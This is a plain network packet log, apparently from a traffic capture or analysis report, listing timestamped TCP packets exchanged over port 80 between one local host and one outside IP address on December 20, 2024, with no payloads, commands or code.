Dec 20, 2024 16:33:10.159512043 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.160156012 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.160209894 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.160490036 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.160578966 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.161266088 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.161326885 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.161885977 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.161942959 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.162317038 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.162367105 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.162615061 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.162693024 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.163486958 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.163539886 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.163830996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.163893938 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.164562941 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.164617062 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.165581942 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.165636063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.165658951 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.165672064 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.165714025 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.166867971 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.166923046 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.167088985 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.167130947 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.167844057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.167903900 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.168059111 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.168101072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.168982029 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.169039965 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.169187069 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.169266939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.170149088 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.170200109 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.170363903 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.170403004 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.171226978 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.171327114 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.171360016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.171360016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.172231913 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.172739983 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.172796965 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.173310995 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.173502922 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.173561096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.174470901 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.174810886 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.174865007 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.175503016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.175555944 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.175941944 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.175981045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.176723957 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.176819086 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.176845074 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.176877022 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.177661896 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.177714109 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.178070068 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.178775072 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.178828955 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.178885937 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.179117918 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.179955959 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.180025101 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.180046082 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.180075884 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.180979013 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.181027889 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.181082010 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.182111025 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.182255030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.182285070 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.182306051 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.183202028 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.183342934 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.183396101 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.184242010 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.184685946 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.184742928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.185333967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.185389042 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.185420990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.186490059 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.186543941 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.186678886 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.187637091 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.187650919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.187720060 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.187839031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.187875032 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.188680887 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.188728094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.188740015 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.188776016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.189697981 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.189744949 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.189805984 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.189908028 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.190826893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.190871000 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.190989017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.191076040 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.191930056 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.192015886 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.192169905 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.192214012 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.193140030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.193181992 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.193351030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.193389893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.194086075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.194190025 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.194236994 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.195291996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.195363045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.195410013 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.196294069 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.196338892 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.196573019 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.197392941 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.197436094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.197581053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.197619915 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.198492050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.198681116 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.198733091 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.199728966 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.199810982 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.199856043 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.200661898 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.200714111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.200745106 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.202599049 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.202613115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.202656031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.202693939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.203073978 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.203144073 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.203176022 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.203218937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.204055071 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.204102039 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.204230070 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.204273939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.205060959 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.205106974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.205656052 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.206207037 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.206254005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.207031965 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.207384109 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.207911968 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.208321095 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.208374977 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.209053040 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.209517002 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.209568024 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.210160971 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.210211992 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.210469007 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.211271048 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.211325884 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.211472988 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.212224007 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.212270975 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.212505102 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.212548971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.213052034 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.213150024 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.347284079 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.347372055 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.347479105 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.347518921 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.347856045 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.347903967 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.348166943 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.348229885 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.348942995 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.349163055 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.349199057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.349239111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.350070953 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.350286961 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.350332022 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.351114035 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.351161003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.351254940 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.351295948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.352273941 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.352330923 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.352417946 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.352454901 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.353362083 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.353703976 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.353745937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.354553938 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.354600906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.354620934 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.354657888 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.355619907 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.355660915 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.355731010 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.356019974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.356662989 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.356709003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.356996059 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.357034922 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.357732058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.357796907 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.357966900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.358007908 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.358884096 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.358927011 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.359582901 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.359662056 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.360030890 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.360044003 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.360078096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.360091925 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.360984087 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.361032009 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.361181021 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.361232996 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.362121105 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.362154961 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.362587929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.362653971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.363204956 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.363219023 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.363255978 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.363279104 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.364295006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.364340067 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.364855051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.364903927 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.365350962 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.365394115 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.365530968 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.365677118 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.366519928 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.366564989 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.367360115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.367423058 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.367573977 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.367614031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.367829084 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.367870092 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.368640900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.368700981 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.369041920 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.369138956 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.369796991 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.369838953 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.370207071 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.370243073 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.370908976 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.370948076 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.371088982 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.371136904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.372018099 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.372065067 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.372283936 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.372323036 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.373083115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.373122931 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.373322964 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.373364925 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.374114990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.374294996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.374330044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.375339031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.375494003 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.375530958 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.376414061 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.376596928 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.376636028 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.377613068 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.377881050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.377926111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.378694057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.378734112 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.378875971 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.379725933 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.379761934 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.380096912 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.380747080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.380789995 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.381468058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.381941080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.381980896 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.382097006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.382137060 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.383074045 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.383244038 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.383284092 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.384618044 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.384676933 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.384716988 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.385521889 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.385688066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.385727882 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.386491060 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.386531115 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.386871099 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.387654066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.387696028 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.388093948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.388741970 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.388783932 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.388958931 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.388998032 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.389688969 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.389857054 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.389894962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.390629053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.390912056 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.390954971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.391738892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.392106056 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.392148972 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.392772913 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.392815113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.392848969 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.393150091 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.393923998 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.393965006 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.394155025 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.394192934 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.394970894 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.395010948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.395067930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.395106077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.396241903 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.396285057 CET	49881	80	192.168.2.6	185.156.73.23
